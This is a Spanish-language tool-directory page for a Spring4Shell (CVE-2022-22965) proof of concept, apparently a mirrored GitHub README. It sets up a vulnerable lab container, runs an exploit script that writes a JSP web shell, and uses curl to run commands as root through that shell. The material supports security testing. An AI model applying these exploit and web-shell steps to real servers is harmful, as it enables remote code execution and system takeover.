Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/sunnyvale-it/cve-2022-22965-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubsunnyvale-it/cve-2022-22965-poc

CVE-2022-22965-PoC

CVE-2022-22965 (Spring4Shell) Prueba de concepto

Ver Repositorio
732hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-22965 (Spring4Shell) Prueba de concepto

Prueba la RCE (Ejecución remota de código) en Spring Core

Construir la imagen

La compilación basada en BuildKit es necesaria, por lo que debes habilitarla.

La forma más sencilla es definir la variable de entorno DOCKER_BUILDKIT=1 al invocar el comando docker build, por ejemplo:

$ DOCKER_BUILDKIT=1 docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core

De lo contrario, para habilitar Docker BuildKit por defecto, establece la función de configuración del demonio en /etc/docker/daemon.json a true y reinicia el demonio:

{ "features": { "buildkit": true } }

De esta forma puedes ejecutar simplemente

$ docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core

Prueba la aplicación vulnerable

$ curl localhost:8080/spring4shell/exploitme
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Spring4Shell PoC Spring Application</title>
</head>
<body>
    Hello World! Exploit me!
</body>
</html>

Ejecuta el exploit

$ python3 exploit-core.py --url "http://localhost:8080/spring4shell/exploitme" --file shell
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id

Si todo ha ido bien, ejecuta comandos arbitrarios en el contenedor a través del puerto HTTP de Tomcat, por ejemplo:

$ curl http://localhost:8080/shell.jsp\?cmd\=id --output -
uid=0(root) gid=0(root) groups=0(root)

//
$ curl http://localhost:8080/shell.jsp\?cmd\=whoami --output -
root

//
$ curl http://localhost:8080/shell.jsp\?cmd\=cat%20/etc/issue --output -
Debian GNU/Linux 11 \n \l


//
Descargar herramienta